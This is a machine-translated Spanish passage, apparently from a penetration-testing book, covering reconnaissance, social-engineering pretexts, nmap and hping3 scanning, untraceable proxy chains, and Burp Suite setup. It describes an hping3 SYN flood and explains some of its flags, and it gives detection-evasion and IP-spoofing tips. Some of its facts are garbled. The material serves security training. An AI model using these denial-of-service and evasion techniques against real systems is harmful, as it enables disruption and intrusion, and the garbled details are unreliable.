otra cosa que debe hacer es realizar recorridos para brindar a la empresa una perspectiva
objetiva de los controles de seguridad que existen actualmente y cómo se pueden eludir.
Del mismo modo, verifique si la empresa tiene cámaras. Si es así, desea saber si funcionan con
una interfaz web. ¿Cuál es su ángulo de visión? Por ejemplo, puede utilizar un dron para volar a
un área para mirar la parte superior de la cámara y mirar detrás de la cámara sin ser detectado.
En resumen, puede ver cuánto movimiento se permite antes de que la cámara se active o dónde
está la visibilidad de la cámara. También deberá asegurarse de consultar las bases de datos.
Aquí es donde intentará acceder directamente a los datos contenidos en la base de datos al
intentar utilizar algunos métodos de descifrado de contraseñas. Tú podrías
Machine Translated by Google
también intente hacer su ataque de inyección SQL estándar, pero no bases de datos basadas en
SQL.
También tendrá que mirar la fuga de datos. Aquí, debe comprender si los datos que descubre
contienen propiedad intelectual, datos privados o confidenciales.
Esta prueba de penetración en particular debe tratar de ayudar a la empresa a evitar que la
información confidencial salga al mercado o a los competidores. Por lo tanto, debe verificar quién
tiene acceso a esos archivos.
También debe tratar de mejorar la conciencia entre los empleados sobre las mejores prácticas.
Esto es más específico, pero si la empresa usa una plataforma SAPP, puede implementar una
prueba de penetración para ver si se ha parcheado correctamente.
Esto es, para que pueda averiguar si hay alguna vulnerabilidad que un atacante podría utilizar, ya
que SAPP contiene mucha información crítica para el negocio.
Otra área a tener en cuenta cuando realiza una prueba de penetración es la prueba de penetración
VPN o Virtual Private Network.
La mayoría de las empresas permiten que algunos de sus empleados trabajen de forma remota,
ya sea que estén de viaje o trabajando desde casa. En cualquier caso, las VPN crean una
conexión confiable a la red interna.
Sabe que el pen-tester intentará obtener acceso a la VPN al intentar comprometer un punto final
remoto o al intentar obtener acceso al túnel VPN, para que puedan acceder a la red.
Además, también deberías intentar acceder a la red de VoIP o Voz sobre IP para intentar grabar
conversaciones o hacer una denegación de servicio para que no puedan comunicarse.
Otra característica popular es la nube, por lo que cuando comienza a usarla, la seguridad se basa
en la responsabilidad compartida tanto del proveedor como del cliente, y existen muchos riesgos
de seguridad asociados con la computación en la nube.
Otras pruebas que debe realizar incluyen dispositivos virtuales. La mayoría de las empresas ya
utilizan la virtualización. El hecho de que el dispositivo host esté completamente parcheado no
significa que la máquina virtual o la máquina virtual lo estén.
Lo que podría encontrar es que el dispositivo virtual está parcheado, pero el host no, y debido a
que el entorno virtual es una duplicación exacta del entorno físico, sufre los mismos problemas de
seguridad.
Cuando realiza este tipo de pruebas, busca ver si es capaz de superar una tecnología más
antigua que una empresa puede haber olvidado.
Debe ver si hay módems antiguos que aún tengan sus contraseñas predeterminadas. Los
módems se identifican mediante un banner.
Ya sea un troyano, un virus o un ransomware, pero, por ejemplo, troyanos diseñados para
robar información confidencial, eliminar datos, reemplazar archivos del sistema operativo, tal
vez incluso realizar un ataque de denegación de servicio, comenzar a observarlo con
registradores de teclas, crear puertas traseras o proporcionar acceso remoto. acceso.
Los virus están diseñados para destruir datos, ralentizar los sistemas, consumir recursos y
también tiene el problema con el ransomware. Como probador de penetración, debe asegurarse
de buscar cualquier puerto que pueda ser sospechoso y que esté abierto.
Otra cosa que debe tener en cuenta cuando realiza la prueba de penetración es la administración
de registros. Los archivos de registro registran quién, qué, dónde, cuándo, de todo en la red,
por lo que se administran esos archivos de registro, se aseguran de que se colocan en
ubicaciones que estén debidamente protegidas o se monitorean para detectar cualquier
modificación.
Una vez que es demasiado tarde, también debe probar la integridad de sus archivos. ¿Cómo
están manejando eso? Aquí, debe asegurarse de que no se alteren los archivos, especialmente
cuando se trata de archivos del sistema operativo.
Eso también está relacionado con el malware, pero debe intentar identificar quién modificó los
datos, cuáles son los atributos y cómo se registran y mantienen.
Cuando se trata de dispositivos móviles, bueno, hoy en día todo el mundo tiene dispositivos
móviles. Todo el mundo quiere estar en el móvil, y las implementaciones de BYOD o Traiga su
propio dispositivo se están volviendo muy populares, por lo que debe comenzar a monitorear y
verificar los dispositivos móviles de las personas.
Técnicamente, debería haber una persona monitoreando los dispositivos móviles en todo momento.
Hablamos de VoIP, pero también tenemos pruebas de penetración de banda ancha y
telecomunicaciones.
No importa qué negocio en qué edificio esté mirando; puede recopilar los datos de todos. Una de
las formas más importantes en que las personas ingresan al sistema es mediante el uso de malware
y ransomware a través del correo electrónico, por lo que también debería considerar la seguridad
del correo electrónico.
El correo electrónico es la comunicación más utilizada en el mundo de hoy. Pero la razón principal
por la que es importante es porque usamos el correo electrónico para almacenar información
personal y datos corporativos con archivos adjuntos.
Por ejemplo, si puede obtener la cuenta de los CIO o CTO, podría tener un impacto significativo en
la empresa. Por lo tanto, la seguridad del correo electrónico debe analizarse tanto interna como
externamente.
Machine Translated by Google
Esto es pasivo en lo que respecta a la investigación. Usted, como pentester, debe intentar
cualquier forma posible de buscar hosts o redes.
Podría ser cualquiera de ellos, pero debe usar cualquier forma posible para recopilar la
mayor cantidad de información posible antes de pasar a la siguiente etapa de la prueba
de penetración.
Si encuentra información que cree que es crítica y cree que no debe esperar un mes o
incluso una semana antes de enviar el informe completo, debe notificar a su contacto de
emergencia de inmediato.
Esta etapa del ataque debería ayudar a prevenir la fuga de información y ayudarlo con
los intentos de ingeniería social. Veamos los detalles.
Lo primero que puede hacer es obtener la autorización adecuada, y será de quien esté a
cargo. Puede o no incluir administradores del sistema.
Muchas veces las empresas deben saber cómo se están desempeñando sus administradores de sistemas.
Después de pasar por ese proceso, debe asegurarse de definir el alcance.
Una vez que haya definido el alcance, debe planificar y recopilar información sobre ese
alcance utilizando sus herramientas de reconocimiento. Debe comenzar con los motores
de búsqueda como Google, Bing o Yahoo, cualquiera que deba usar para ver qué
información está expuesta actualmente.
También puede consultar otros sitios específicos, como sitios de redes sociales como
Facebook, y ver si hay una página de Facebook o una cuenta de Twitter para la empresa.
Machine Translated by Google
A continuación, debe ver quiénes son amigos de esa empresa porque allí es donde encontrará
empleados existentes y verá si puede retroceder desde allí.
Una vez que haya terminado de buscar en los motores de búsqueda, debe intentar ver si puede
"hackearlos con Google". Puede hacerlo utilizando herramientas adicionales que le brindan una
interfaz gráfica de usuario, como SiteDigger o la base de datos de piratería de Google.
Al piratear Google, le permitirá encontrar recursos que han sido rastreados por el motor de
búsqueda de Google que las empresas pueden no saber que están incluidos allí, como
impresoras o cámaras, lo que podría brindarle una idea de las direcciones IP que están
expuestas, o que maquina tienen.
Tu próximo paso después del hackeo de Google es ir tras las redes sociales, como Facebook,
Twitter o LinkedIn.
La gente tiene una tendencia a nivel de redes sociales a bajar la guardia. Es fácil no ver de qué
está hablando la gente, pero las conversaciones iniciales con los usuarios o los empleados
pueden ser una excelente manera de recopilar información.
Puede iniciar una conversación con un empleado existente y decirle: “Hola, parece que tiene una
excelente empresa y he estado pensando en unirme al equipo de TI. ¿Qué tipo de dispositivos
usas allí?
Su próximo paso es ir y rastrear los sitios web, y lo hará con BlackWidow o Web Site Copier. Con
esta herramienta, primero debe descargar su sitio web para poder verlo sin conexión y ver el
código.
Debe recordar que todo lo que se le presenta en una interfaz web son archivos que se descargan
en su sistema. Por lo tanto, ¿por qué no descargar una copia exacta de ese sitio web para que
pueda ver lo que están haciendo en el back-end, especialmente si están haciendo llamadas
desde el front-end al back-end?
A continuación, puede comenzar a investigar algunas huellas de correo electrónico. Puede usar
algunas herramientas excelentes que lo harán por usted, como el comando "nslookup" para
averiguar los nombres DNS y las direcciones IP de sus servidores.
cifrado que están utilizando y otros servicios que podrían utilizarse junto con su entorno de
correo electrónico.
También puede averiguar cómo alojan los servidores de correo electrónico o qué proveedores
de alojamiento utilizan. A continuación, puede hacer algo de inteligencia competitiva.
La inteligencia competitiva es la forma que la mayoría de las empresas utilizan para conocer a
sus competidores. Los atacantes pueden usar estos mismos recursos para averiguar qué está
haciendo la gente, y también es una excelente manera para que las empresas descubran en
qué proyectos están trabajando actualmente sus competidores.
A continuación, debe realizar un reconocimiento "whois", para que pueda averiguar quién posee
el rango de direcciones IP o su dominio. Para lograr esto, puede utilizar herramientas como
Domain Dossier o SmartWhois.
A veces, estas herramientas también harán una enumeración necesaria basada en DNS, que
es su próximo paso. Para el reconocimiento de DNS, puede usar herramientas como Sam
Spade o DNSstuff, pero siempre usa el comando "nslookup", que es muy poderoso.
Una de las razones por las que debe realizar un reconocimiento de DNS es porque puede
determinar hosts clave en la red que luego puede usar para realizar ataques de ingeniería social
o podría usar durante un ataque de envenenamiento de DNS.
Su próximo paso es realizar un reconocimiento de la red. Para este propósito, debe usar tipos
de herramientas, como "Path Analyzer Pro", que le mostrará la ruta que toma un paquete, o la
herramienta Network Pinger o VisualRoute que le permite obtener más información sobre la red
objetivo.
Otros ataques de ingeniería social también incluyen el buceo en basureros o el espionaje. Estos
le permitirán recopilar información, como los productos de seguridad de la organización que
están utilizando, los sistemas operativos, las versiones de software, el diseño de la red, las
direcciones IP o los nombres de sus servidores.
Debe asegurarse de documentar todo lo que encuentre. Esto se debe a que tendrá que usar
este documento y toda la información que tiene
Machine Translated by Google
Cuando se trata de escanear su dispositivo de destino, debe averiguar qué sistemas están
activos en la red y con qué frecuencia están activos en la red.
Además, ¿solo están despiertos durante ciertos horarios? También tendrá que descubrir los
puertos que están actualmente abiertos en estos nodos y los servicios que se están
ejecutando.
Cada una de estas cosas lo ayudará a determinar si existe alguna vulnerabilidad que pueda
perseguir en su dispositivo de destino. Otra forma de escanear la red es descubrir si hay
algún banner que pueda captar.
Al realizar este proceso, aprenderá qué puertos desea cerrar y, si hay banners, puede
ocultarlos o personalizarlos. También deberá ver qué servicios no desea y, si no los desea,
debe desactivarlos.
Esto también podría brindarle una comprensión de cómo puede estandarizar su firewall y las
reglas del sistema de detección de intrusos, y también verá el vector de configuración
incorrecta y lo que desea hacer para corregir esas configuraciones incorrectas.
Una vez que comience el proceso de escaneo, debe ejecutar un descubrimiento de host,
que detectará los hosts que están activos en la red de destino. Existen numerosas
herramientas que podría usar, y algunas de ellas están basadas en GUI, mientras que otras
están basadas en la línea de comandos.
Por ejemplo, la herramienta llamada "Nmap" analiza el entorno basado en DOS o solo en el
símbolo del sistema. Nmap también tiene una versión GUI que se llama Zen Map. También
existen otras herramientas, pero estas son las más populares.
Estas herramientas no están destinadas a engañar; pero puedes usarlos de esa manera
también. Una vez que reunió una lista de nodos que están activos en la red, su próximo
objetivo es realizar un escaneo de puertos.
Al ejecutar un escaneo de puertos, sabrá qué puertos están abiertos. A través de esos
puertos, un atacante puede instalar malware en un sistema o aprovechar vulnerabilidades
específicas.
Por lo tanto, siempre debe verificar qué puertos están abiertos e incluirlos en su informe si
no es necesario que estén abiertos. Algunas herramientas que puedes usar son
Machine Translated by Google
“nmap” del que ya hablé, pero hay que entender que algunas de estas herramientas son
herramientas multipropósito.
Otra herramienta que puede utilizar se llama "NetScanTools Pro". Es posible que tenga otras
herramientas que prefiera, pero debe elegir una y dominarla. Mientras tanto, también es bueno
tener exposición a otras herramientas, y no es solo por su experiencia o para poner en su CV,
sino también por otras razones.
Por ejemplo, cuando comience a usar estas herramientas, se dará cuenta de que cada uno
de estos programas tiene ciertas limitaciones, y mientras uno de ellos hace un trabajo, el otro
puede ayudarlo a hacer mejor otro trabajo.
Le recomiendo que se concentre en “Nmap” para su futuro inmediato, así como para su
mundo real. Nmap es una herramienta muy útil y flexible, pero cuando se trata de esta
industria, a la mayoría de los hackers éticos o profesionales de pruebas de penetración les encanta.
El siguiente paso es una captura de banner. A veces, las personas se refieren a ella como
una huella digital del sistema operativo. Al hacer una captura de banner, puede enviar
comandos individuales a un sistema y responde de una manera específica, y sabemos que
los dispositivos Windows reaccionan de cierta manera, al igual que los dispositivos Linux.
Todos y cada uno de los sistemas operativos responden con un enfoque diferente a los
mismos comandos y las Mac también hacen lo mismo. Estas respuestas identifican el sistema
operativo, lo que le permite encontrar y explotar la vulnerabilidad relacionada con ese sistema
operativo.
Las herramientas que puede utilizar para capturar banners incluyen dispositivos como "Telnet
o SSH". A continuación, puede comenzar a buscar vulnerabilidades. Escaneando la red en
busca de vulnerabilidades, puede utilizar herramientas específicas, pero puede tener sus
propias preferencias, así que permítame darle una descripción general.
Algunas de las mejores herramientas que puede usar para escanear la red en busca de
vulnerabilidades son "Core Impact Professional" o "Retina". Microsoft también fabrica uno que
se llama MBSA, también conocido como Microsoft Baseline Security Analyzer, o GFI LanGuard.
Punto, tendrá mucha información, y esto va junto con la documentación, pero también debe
dibujar la red.
Esto lo ayudará a comprender la conexión y la ruta entre los nodos de la red, y existen
numerosas herramientas que puede usar para dibujar un diagrama de red fácilmente.
Para este propósito, una de las mejores herramientas que puede usar se llama "SolarWinds" y
"Administrador de topología de red". Algunas de estas herramientas son gratuitas, mientras que
otras son productos de pago.
La mayoría de las empresas utilizan "SolarWinds", que puede utilizar para diversos fines. Con
SolarWinds, puede dibujar mapas de red, puede enviar comandos a varios dispositivos en
tiempo real o, si lo prefiere o lo requiere, puede programar la fecha y la hora de las
implementaciones de comandos.
Puede utilizar SolarWinds para fines de gestión de IP, así como para alertar sobre interrupciones
de la red o tiempos de inactividad de la interfaz, etc. SolarWinds tiene un costo, pero es un gran
software y las empresas lo utilizan para numerosos propósitos.
Su objetivo es obtener una representación visual para comprender mejor qué es, dónde y cómo
están conectados. Una vez que conoce los objetivos porque los identificó por completo y sus
vulnerabilidades, y ha elaborado la topología de la red, el siguiente paso durante su prueba de
penetración es activar sus proxies.
El proxy está diseñado para ocultar servidores para que el cliente o cliente no pueda determinar
de dónde proviene el ataque. Podrías activar ambos proxies; internamente y externamente.
Una de las mejores herramientas que puede usar para proxies se llama "Proxy Workbench".
Proxy Workbench tiene una interfaz GUI que utiliza la red TOR. Otro producto para Mac OS se
llama “proxifier”.
Una vez que comience a ejecutar su proxy deseado, obtendrá una lista de direcciones IP y
podrá seleccionar cuántas debe usar. Algunos de estos proxies son servicios gratuitos, y si
busca en Google "proxies gratuitos", puede crear una cadena de proxy en muy poco tiempo.
Cualquiera que sea el proxy que usará, también debe documentarlo.
ayudarlo a encontrar vulnerabilidades potenciales en la red, para que pueda recomendar algunas
contramedidas.
Al mismo tiempo, también desea mostrarle a su cliente cómo pudo lograr lo que hizo. Esta es
también la mejor manera de legitimar lo que hiciste y lo que un atacante podría hacerles.
Una vez que haya encontrado sus objetivos, el siguiente paso es la enumeración. Mediante la
enumeración, el atacante puede recopilar tanta información como pueda sobre el dispositivo de
destino.
Algunos informes que puede sacar de estos sistemas deben incluir grupos de identidad, cuentas
de usuario y cuentas de servicio porque nadie mira esas cosas.
También puede determinar los recursos de red y sus recursos compartidos de red u otros
hallazgos que se comparten desde esa máquina. En muchos casos, también puede enumerar
las aplicaciones que están instaladas en esos dispositivos.
El paso de enumeración se basa en los datos que recopila de la etapa de reconocimiento, pero
también debe considerar enumerar los dispositivos de red.
Usted, como evaluador de penetración, debe realizar numerosos tipos diferentes de métodos de
enumeración para asegurarse de obtener toda la información que pueda de cada máquina visible
en la red de destino.
La razón por la que debe hacer esto es para determinar las debilidades y vulnerabilidades de la
red de la organización. El propósito principal es tratar de identificar las brechas de la infraestructura
de la red.
Puede comenzar los pasos de enumeración encontrando el rango de red de la empresa o los
objetivos, y puede hacerlo con un comando "whois" para buscar dispositivos, de modo que pueda
ver qué rangos se les han asignado en el lado público.
Aquí es donde se encuentran los servidores más importantes porque generalmente es la cara de
la empresa, y eso es brindar un servicio, donde las personas inician sesión u obtienen información
sobre la empresa.
Machine Translated by Google
Una vez que tenga ese rango de IP, querrá calcular la máscara de subred, lo que
puede ayudarlo a reducir sus barridos de ping. Esto también lo ayudaría con el escaneo
de puertos.
Una vez que haya calculado la máscara de subred, el siguiente paso es descubrir los
hosts que están disponibles públicamente en Internet. Una vez más, la primera
recomendación es utilizar software como “nmap”.
Puede seguir adelante y usar otro software, pero pueden ser más detectables. Por
ejemplo, "escáner de IP enojado" es extremadamente fácil de detectar, pero con
"nmap", estará bien, especialmente si está mapeando solo una vez por minuto, por lo
que no parecerá un barrido de ping.
Una vez que haya descubierto los hosts, debe ir tras los puertos. Desea poder ver qué
puertos están abiertos, cuáles están cerrados y qué puertos solo permiten el paso de
tráfico específico.
están asignados a.
Una de las mejores herramientas que puede usar para la enumeración SNMP incluye
SolarWinds y el "conjunto de herramientas de monitoreo de red OpUtils". Debido a que SNMP
no siempre se usa en máquinas de red como enrutadores y conmutadores, puede instalar
SNMP en servidores para administrar esos dispositivos o para recibir una notificación cuando
algo sucede.
Si aún no has dibujado tu mapa, debes hacerlo con una enumeración LDAP. LDAP es parte de
Active Directory, pero también hay otros productos que admiten el entorno LDAP.
LDAP es una base de datos donde se almacena la información del usuario, como su nombre,
apellido, información personal, hora y fechas en las que pueden iniciar sesión, desde dónde
pueden iniciar sesión, en qué departamentos trabajan, etc. en.
Una vez que haya realizado su enumeración LDAP, otro método que puede usar se llama
"enumeración NTP". Las pruebas de penetración externas prueban la seguridad que rodea los
sistemas conectados externamente desde Internet.
Las pruebas controladas se utilizan para obtener acceso a los recursos de Internet y, en última
instancia, a la "DMZ", que es una red interna que atraviesa y rodea los firewalls de Internet.
¿Cómo va a ejecutar la tarea de prueba de penetración externa? Bueno, una vez que le pidió
a su cliente información sobre su infraestructura, debe dibujar un diagrama visual que represente
la infraestructura de la organización del cliente.
Los dibujos deben incluir ambos; las partes físicas y las personas asociadas con ese artículo,
si es posible. Su mapa de red también debe incluir rangos de IP que el cliente ya le haya dado.
El "mapeo de rutas" se usó originalmente como una herramienta de diagnóstico que le permite
ver la ruta que sigue un paquete IP de un host al siguiente. Usando el campo "TTL" o "Tiempo
de vida" en un paquete, cada salto de un punto al siguiente provoca un mensaje de tiempo
excedido "ICMP". ICMP significa Protocolo de mensajes de control de Internet.
Los paquetes cuentan el número de hosts y la ruta tomada. Por ejemplo, el host de origen es
su Kali Linux, y el servidor de Google está conectado por dos enrutadores intermedios, que
llamaré "R1" y "R2".
Primero, el nodo Kali enviará una sonda TTL 1 al enrutador R1. Luego, R1 lo recogerá y enviará
una respuesta con el tiempo excedido.
A continuación, el host de Kali enviará una sonda TTL 2 a R1, donde R1 la toma y la reduce en
uno, y luego la envía a R2. R2 lo recogerá y devolverá un paquete con tiempo excedido.
Finalmente, el nodo Kali enviará una sonda TTL 3 a R1. R1 lo recogerá, lo disminuirá en uno y
luego lo enviará a R2. Después de eso, R2 lo recogerá, lo disminuirá en uno y lo enviará al
servidor de Google.
Cuando el servidor de Google lo recoge, envía una respuesta con el puerto de destino
inalcanzable. ¿Por qué? Porque la mayoría de las veces, los servidores bloquean los paquetes
para este tipo de puerto.
En Kali Linux, “traceroute” es un programa de línea de comandos que usa paquetes ICMP para
mapear la ruta. Para rastrear la ruta al servidor de Google, escriba "traceroute www.google.com"
y debería ver que tomó entre 12 y 16 saltos para llegar al servidor de Google. Si lo intenta una
vez más, pero esta vez ejecútelo usando "nmap", obtendrá un resultado un poco diferente. ¿Por
qué?
Bueno, "nmap" le permite hacer exactamente lo mismo, pero en su lugar utiliza el protocolo
TCP, que es permitido por casi todos los cortafuegos.
Para darle una idea acerca de algunos ejemplos básicos de escaneo de Nmap que se usan a
menudo en la primera etapa de la enumeración, consulte los siguientes comandos:
Machine Translated by Google
completo de puertos TCP con detección de versión de servicio: generalmente mi primer escaneo, encuentro
que T4 es más preciso que T5 y aún "muy rápido".
una salida detallada, ejecuta un escaneo de sincronización oculto, temporización T4, detección de versión y
sistema operativo y proporciona traceroute y scripts contra los servicios de destino.
una salida detallada, ejecuta un escaneo de sincronización sigiloso, temporización T5, detección de versión y
sistema operativo y proporciona traceroute y scripts contra los servicios de destino.
Imprime resultados detallados, ejecuta escaneo de sincronización sigiloso, temporización T4, detección de versión y
sistema operativo y proporciona escaneo de rango completo de puertos.
Imprime resultados detallados, ejecuta escaneo de sincronización sigiloso, temporización T5, detección de versión y
sistema operativo y proporciona escaneo de rango completo de puertos.
Cada vez que vea tres puntos en la salida de la línea de comandos, significa que los paquetes están
bloqueados. La razón de esto podría ser un firewall como Checkpoint o Cisco ASA Firewalls que descartan
este tipo de paquetes de forma predeterminada.
El escaneo de puertos con "nmap" es el proceso de conexión a puertos TCP y UDP para determinar qué
servicios y aplicaciones se están ejecutando en el objetivo
Machine Translated by Google
sistema.
Hay 65, 535 puertos para TCP y UDP en cada computadora. Se sabe que algunos puertos
están asociados con servicios particulares, por ejemplo, el puerto TCP 21 es conocido por el
servicio FTP.
Los primeros 124 000 puertos también se conocen como "puertos bien conocidos" y son
utilizados por la mayoría de los servicios definidos. Siempre que hable sobre el escaneo de
puertos, "nmap" debería venir a su mente.
Para que "nmap" funcione, al menos un puerto de escucha debe estar abierto y el sistema
operativo debe ser conocido y con huellas dactilares. Podríamos pasarnos todo el libro hablando
de “nmap”, y si nunca lo has usado antes, te recomiendo que le eches un vistazo.
También hay otros recursos sobre el descubrimiento básico de host en términos de solicitudes
de eco ICMP y respuestas de eco, así como consultas relacionadas con DNS y cómo se
resuelven los nombres de host.
Cuando se trata de cortafuegos, hay tipos "con estado" y "sin estado". Bueno, también hay
cortafuegos basados en zonas, cortafuegos basados en políticas y muchos más, pero en
resumen; los firewalls con estado permiten el tráfico entrante si se inició desde la red interna
proveniente de una red externa.
Los cortafuegos sin estado, por otro lado, son cortafuegos que descartan paquetes entrantes
incluso si el tráfico se inició desde el interior; a menos que se haya implementado previamente
una regla de "aceptación" de firewall que permita el tráfico desde un origen específico a un
destino específico en un número de puerto específico.
Nmap utiliza la función de "trazado de ruta" para identificar su camino hacia el servidor que ha
elegido como su destino. Una vez que haya identificado algunas direcciones IP con nmap,
también puede usar el comando "traceroute" para determinar qué saltos hay en el camino entre
usted y los dispositivos finales que ha identificado.
Una vez que se completa el "trazado de ruta", el primer paso es ejecutar un barrido de ping de
red contra un espacio de direcciones IP de destino y buscar respuestas que indiquen que un
Machine Translated by Google
el objetivo en particular está vivo. Tradicionalmente, hacer ping se refería al uso de paquetes
“ICMP”.
Sin embargo, el tráfico TCP, UDP, ICMP y ARP también se puede utilizar para identificar hosts
activos. Hay varios escáneres que se pueden usar para ejecutar desde ubicaciones remotas a
través de Internet para identificar hosts en vivo.
Si bien la herramienta principal del escáner es "nmap", Kali proporciona varias otras
aplicaciones que son útiles, como "hping3".
“Hping3” es una de las herramientas más útiles debido al control que brinda sobre los tipos de
paquetes, el paquete de origen y el paquete de destino. Por ejemplo, si desea hacer ping al
servidor de Google, bueno, si Google no permite las solicitudes de ping ICMP, entonces podría
ser posible hacer ping al servidor de Google utilizando la solicitud de envío TCP.
Por ejemplo, puede hacer ping a google.com desde la línea de comando, usando el comando
ping con el argumento "-c", que establecerá un conteo de envío de tres paquetes al servidor
de Google.
Si ve una pérdida de paquetes del 100 %, significa que Google está bloqueando los comandos
de ping basados en paquetes ICMP. Esto no debería detenerlo en absoluto, porque tiene
instaladas las herramientas más poderosas en Kali, que es "hping3".
El comando que debe usar es el mismo, pero en lugar de escribir ping, solo escriba "hping3"
seguido de la dirección de destino.
Puede crear varias variaciones de la herramienta "hping3" que también descubrirá hosts en
vivo y todo el mapa utilizando respuestas ICMP y paquetes enviados por TCP en los puertos
80 y 443 al mismo tiempo.
Puede usar argumentos junto con el comando, como "-t", que representa el tiempo, seguido
de un número entre 1 y 5, donde 1 es el más lento y 5 el más rápido.
Luego, el indicador "-sn" se usa para el descubrimiento de hosts, seguido de la opción "-v",
que se usa para verbose perfect. En breve, veremos un ejemplo específico del uso de hping3,
pero antes de eso, resumiremos NTP SMTP y DNS.
NTP significa Network Time Protocol, que es el reloj o el protocolo de sincronización de tiempo.
Desafortunadamente, NTP a veces le permite consultar
Machine Translated by Google
servidores que actúan como sincronización de tiempo para obtener más información, como una lista
de pares y algunas otras estadísticas que a menudo son consultadas por las personas.
Hay un software llamado "Utilidad de huellas dactilares NTP", que le permite identificar el sistema
operativo en el que se ejecuta el servidor NTP. A continuación, debe intentar probar la enumeración
SMTP.
SMTP significa Protocolo simple de transferencia de correo, que se utiliza para correos electrónicos
y servidores de correo electrónico. Puede usar un script de Perl llamado "enumeración SMTP" y
numerosos conmutadores con nmap para exponer direcciones de correo electrónico legítimas, que
podrían incluir nombres de usuario de usuarios finales.
El software llamado "Metasploit" también podría ayudarlo a enumerar los correos electrónicos de los
usuarios utilizando el protocolo SMTP. Una vez que haya probado la enumeración SMTP y la
enumeración LDAP, también existe el servicio llamado DNS.
DNS es su servicio de nombres de dominio, que es un servicio que realiza un seguimiento de los
nombres de dominio a sus direcciones IP. Hay muchas herramientas que puede usar para la
enumeración de DNS, incluidas "BioSuite", "Nmap" o "Búsqueda de DNS de TX". También asegúrese
de recordar el comando "nslookup".
Ahora que tiene un montón de información que ha recopilado, debe actualizar su documentación. De
hecho, su documentación debe actualizarse casi en cada paso del camino.
También debe usar su documentación a medida que la crea, de modo que pueda analizar los
resultados y sugerir algunas contramedidas al cliente para mejorar su seguridad. Solo recuerde que
el objetivo es asegurarse de proteger al cliente y brindarle comentarios.
Tenga en cuenta que el resto de este libro se centrará en ejemplos concretos de cómo se pueden
implementar los ataques.
Machine Translated by Google
Si no tiene respuesta de un dispositivo que está seguro de que existe, es posible que el
firewall se haya configurado para no permitir solicitudes de ping a fin de eliminar los ataques
de denegación de servicio, y eso es comprensible, pero aún desea verificar ese dispositivo. .
Las grandes organizaciones deshabilitan las respuestas de ping filtrándolas en sus firewalls.
Sin embargo, si aún queremos validar que el dispositivo al que intentamos hacer ping está
activo, podemos usar muchas otras herramientas que ya discutimos, como nmap y ZenMAP.
Hping3 reemplazó la versión anterior conocida como ping2 y ahora tiene funciones
adicionales además del ping ICMP, tales como: ÿ Solicitud de ping con TCP, ÿ Solicitud de
Con Hping3, puede especificar hacer ping no solo a una dirección, sino a cientos
de direcciones al mismo tiempo, y puede manipular su propia dirección IP de origen
para que se parezca a cualquier otra dirección IP que desee.
Además, puede manipular su interfaz de origen desde donde se originó el ping.
Por lo tanto, es casi imposible rastrearlo hasta su origen.
fuente.
No entraré en todas las posibilidades que puede hacer con Hping3, pero
mencionaré que es muy fácil crear un ataque de denegación de servicio.
Para establecer una conexión entre dos dispositivos de red, debe haber un
protocolo de enlace TCP de 3 vías y su primer paso debe ser una solicitud SYN.
SYN significa Sincronización.
22 > Esto representa el número de puerto "ssh", pero puede especificar cualquier puerto que
se haya identificado como puerto abierto con herramientas como nmap.
--flood > Esto significa que le estoy diciendo a Kali Linux que envíe las solicitudes SYN lo
más rápido posible.
Usar este conjunto de comandos no es una broma. Puede dañar seriamente la CPU de
cualquier dispositivo si ejecuta dicho comando incluso durante unos segundos. Si elige
dejarlo funcionar durante minutos, le prometo que muchos dispositivos probablemente se
rendirán y se apagarán.
Esta es también la razón por la que le advierto que se asegure de tener una autorización por
escrito antes de usar este comando en un entorno de producción.
Además de eso, incluso si desea practicar en el entorno de su laboratorio doméstico, no deje
que se ejecute durante más de unos segundos, ya que puede causar daños muy graves a
sus propios dispositivos de red.
Machine Translated by Google
Burp proxy es un componente crucial de toda la aplicación Burp Suite. Burp proxy es otra herramienta
que puede usar que le permite interceptar el tráfico web entre el navegador y la aplicación de destino,
que es el propio servidor web.
Para iniciar Burp Suite, vaya al menú de la aplicación, luego seleccione el elemento Kali Linux, seguido
de las 10 mejores herramientas de seguridad, y luego seleccione Burp Suite de la lista.
Burp Suite es la versión gratuita dentro de Kali por defecto, pero también puedes usar la versión
profesional y tendrás acceso a todas las funcionalidades de esta aplicación.
La versión gratuita es un buen punto de partida si quieres aprender cómo funciona esta aplicación. Una
vez que tenga Burp en funcionamiento, querrá asegurarse de que su proxy esté habilitado y escuchando
en el puerto 8080.
Vaya a la pestaña Proxy, seleccione la pestaña Opciones, luego debería ver que el agente de escucha
del proxy se está ejecutando y escuchando en el puerto 8080.
A continuación, debe configurar su navegador para que pueda usar el puerto en el que estaba
escuchando Burp Suite. Puede usar una herramienta de "complemento" llamada "proxy foxy" para
Firefox.
Es una manera fácil de tener múltiples proxies y poder cambiar entre ellos rápidamente. Después de
instalar “foxy proxy”, justo al lado de la barra de URL del navegador, hay un zorro con un círculo y una
línea a lo largo. Haga clic en el zorro y luego haga clic en agregar un "nuevo proxy".
En la pestaña "Detalles del proxy", deberá establecer la configuración manual del proxy en el host local
y el puerto del proxy en 8080. A continuación, haga clic en la pestaña General, asigne un nombre a ese
proxy y finalmente haga clic en el botón Guardar.
Básicamente, lo que ha hecho es decirle a su navegador que envíe todo el tráfico a su host local al
puerto 8080. Este es el puerto en el que configuró la aplicación Burp Suite para escuchar.
Burp sabe que tomará tráfico y lo transmitirá a Internet. Una vez que haya guardado este perfil, haga
clic derecho en el zorro y seleccione su configuración de proxy.
Machine Translated by Google
Para este escenario, puede nombrarlo "Burp proxy", y si tiene que comenzar a
usarlo, todo lo que tiene que hacer es hacer clic en él. Una vez que su
navegador esté usando el proxy, puede navegar a la aplicación web. Si regresa
a Burp, verá el proxy y la luz de la pestaña de intercepción está encendida y
cambia a color naranja.
Si ves que esto sucede, sabes que lo has configurado todo a la perfección.
Debería ver que Burp capturó con éxito la solicitud de obtención del sitio web.
Por defecto, el estado inicial es interceptar todo el tráfico.
Interceptar significa detener cualquier solicitud del navegador a la aplicación
web y le dará la capacidad de leer o modificar esa solicitud. Si intenta navegar
a cualquier sitio con la configuración predeterminada, no podrá ver ninguna
respuesta hasta que desactive el botón de intercepción.
Al hacer clic en el botón de intercepción para desactivarlo, seguirá capturando
todo el tráfico web, pero no manipulará directamente cada solicitud. La
intercepción está activada o desactivada. Además, puede ver todas las
solicitudes y las respuestas en la pestaña Historial.
Machine Translated by Google
Un buen entorno para las pruebas de penetración web es el sitio web mutillidae.com, que ya está
instalado en una máquina "metasploitable". El "metasploitable" es un sistema operativo Linux y
está preconfigurado para realizar pruebas de penetración.
Para descargar una copia del host metasploitable, debe navegar al sitio web del proyecto en
